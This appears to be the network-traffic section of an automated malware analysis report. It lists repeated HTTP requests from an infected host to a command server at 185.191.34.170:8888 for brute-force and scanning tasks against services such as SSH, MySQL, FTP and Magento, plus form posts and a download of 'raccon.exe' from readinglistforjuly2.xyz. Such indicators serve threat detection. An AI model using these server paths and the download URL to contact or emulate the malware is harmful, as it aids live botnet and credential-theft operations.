Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforjuly2.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: readinglistforjuly2.xyz
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/knock?worker=Universal&os=Windows&version=3.13 HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /bots/chkVersion?currVers=3.13&arch=win HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=php_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=cp_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=whm_chk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftp_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ftpChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
